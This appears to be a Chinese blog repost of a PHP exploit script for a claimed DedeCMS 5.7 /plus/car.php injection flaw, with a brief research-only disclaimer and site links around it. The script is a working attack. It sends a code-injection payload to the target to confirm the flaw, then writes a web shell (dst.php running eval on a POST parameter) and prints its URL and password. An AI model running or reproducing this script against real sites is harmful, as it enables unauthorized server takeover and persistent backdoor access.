博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
织梦(dedecms) 5.7 /plus/car.php sql注入0day
阅读量:6041 次
发布时间:2019-06-20

本文共 1312 字,大约阅读时间需要 4 分钟。

测试方法:

@Sebug.net   
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. $host=$argv[1];
    3. $path=$argv[2];
    4. $path=$path."plus/car.php";
    5. $url=$path;
    6. if(count($argv)<3){
    7. print_r('
    8. Usage: php '.$argv[0].' host path
    9. Example:
    10. php '.$argv[0].' www.site.com /dede/
    11. 作者:舞林 http://t.qq.com/wulinlw
    12. 修改:小逸
    13. ');
    14. exit;
    15. }
    16. $data='$a=${@phpinfo()};';
    17. $buffer = POST($host,80,$url,$data,30);
    18. preg_match("/allow_url_fopen/i", $buffer, $arr_suc);
    19.  
    20. $str="allow_url_fopen";
    21. if($arr_suc[0]==$str){
    22. echo "Congratulations,target exist this bug.\n";
    23. $data='$a=${@file_put_contents("dst.php","<?php eval(\$_POST[cmd]); ?>")};';
    24. $buffer = POST($host,80,$url,$data,30);
    25. echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
    26. }
    27. else {
    28. echo "Sorry,target may not exist this bug.";
    29. exit;
    30. }
    31. function POST($host,$port,$path,$data,$timeout, $cookie='') {
    32. $buffer='';
    33. $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
    34. if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
    35. else {
    36. fputs($fp, "POST $path HTTP/1.0\r\n");
    37. fputs($fp, "Host: $host\r\n");
    38. fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
    39. fputs($fp, "Content-length: ".strlen($data)."\r\n");
    40. fputs($fp, "Connection: close\r\n\r\n");
    41. fputs($fp, $data."\r\n\r\n");
    42.  
    43. while(!feof($fp))
    44. {
    45. $buffer .= fgets($fp,4096);
    46. }
    47. fclose($fp);
    48. }
    49. return $buffer;
    50. }
    51. ?>
    52. 摘自:http://sebug.net/vuldb/ssvid-60162

转载地址:http://ebrhx.baihongyu.com/

你可能感兴趣的文章
用wxpython制作可以用于 特征筛选gui程序
查看>>
【转载】 [你必须知道的.NET]目录导航
查看>>
数据存储小例
查看>>
Spring Boot 配置优先级顺序
查看>>
php 信号量
查看>>
C++中构造函数详解
查看>>
数据库课程实习设计——酒店房间预订管理系统
查看>>
vue.js的模板渲染
查看>>
关于H5+css3的一些简单知识
查看>>
Google-Authenticator
查看>>
FOJ有奖月赛-2015年11月 Problem A
查看>>
电商网站中添加商品到购物车功能模块2017.12.8
查看>>
android 模拟器 hardWare 属性说明
查看>>
六款值得推荐的android(安卓)开源框架简介
查看>>
max_element( )
查看>>
CSS Grid 布局
查看>>
接口的幂等性
查看>>
java中的类
查看>>
android 自定义文字跑马灯 支持拖拽,按住停止滚动,自定义速度
查看>>
SpringMVC完成文件上传的基本步骤
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-01-03 05:11:12   当前IP: 3.139.79.187   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我